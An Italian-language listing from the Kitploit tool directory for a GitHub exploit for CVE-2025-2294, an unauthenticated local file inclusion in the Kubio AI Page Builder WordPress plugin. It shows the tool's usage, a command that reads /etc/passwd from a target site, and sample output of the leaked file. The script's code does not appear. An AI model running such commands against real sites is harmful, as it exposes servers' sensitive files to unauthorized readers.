Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-2294 — Kubio AI Page Builder <= 2.5.1 - Inclusione di File Locale non Autenticata | Kitploit
Strumenti/GitHubGitHub/rhz0d/cve-2025-2294
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration TestingApprendimento e Formazione
GitHubrhz0d/cve-2025-2294

CVE-2025-2294

Kubio AI Page Builder <= 2.5.1 - Inclusione di File Locale non Autenticata

Vedi Repository
11 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

🚨 Kubio AI Page Builder <= 2.5.1 - Inclusione Locale di File Non Autenticata

📝 Descrizione

Il plugin Kubio AI Page Builder per WordPress è vulnerabile all'Inclusione Locale di File in tutte le versioni fino alla 2.5.1 inclusa tramite la funzione kubio_hybrid_theme_load_template. Ciò rende possibile ad attaccanti non autenticati includere ed eseguire file arbitrari sul server, permettendo l'esecuzione di qualsiasi codice PHP in quei file. Questo può essere utilizzato per bypassare i controlli di accesso, ottenere dati sensibili o ottenere l'esecuzione di codice in casi in cui immagini e altri tipi di file "sicuri" possono essere caricati e inclusi.

  • CVE: CVE-2025-2294
  • CVSS: 9.8 (Critico)
  • Pubblicato pubblicamente: 27 marzo 2025
  • Ultimo aggiornamento: 27 marzo 2025

💥 Dettagli dell'Exploit

Questo script sfrutta la vulnerabilità nel plugin Kubio AI Page Builder per includere ed eseguire file arbitrari sul server. L'exploit permette ad attaccanti non autenticati di leggere file sensibili dal server.

⚙️ Requisiti

  • Python 3.x
  • libreria requests

🚀 Utilizzo

root@kitploit:~
usage: CVE-2025-2294.py [-h] -u URL [-f FILE]

Exploit for CVE-2025-2294 Kubio AI Page Builder <= 2.5.1 - Unauthenticated Local File Inclusion # By: rHz0d

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Target base URL (e.g., https://example.com)
  -f FILE, --file FILE  File to read (default: /etc/passwd)

📋 Esempio

root@kitploit:~
python3 CVE-2025-2294.py -u https://targetwebsite.com -f /etc/passwd

🔍 Output

root@kitploit:~
[+] Target is vulnerable. Exploiting...
[+] Exploit successful. File content:
root:x:0:0:root:/root:/usr/bin/zsh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
systemd-timesync:x:992:992:systemd Time Synchronization:/:/usr/sbin/nologin
messagebus:x:100:102::/nonexistent:/usr/sbin/nologin
tss:x:101:104:TPM software stack,,,:/var/lib/tpm:/bin/false
strongswan:x:102:65534::/var/lib/strongswan:/usr/sbin/nologin
tcpdump:x:103:105::/nonexistent:/usr/sbin/nologin
sshd:x:104:65534::/run/sshd:/usr/sbin/nologin
usbmux:x:105:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin


⚠️ Disclaimer

Questo exploit è fornito solo a scopo educativo. L'autore non è responsabile per qualsiasi uso improprio di questo strumento. Usalo a tuo rischio.

Di: rHz0d

Scarica lo strumento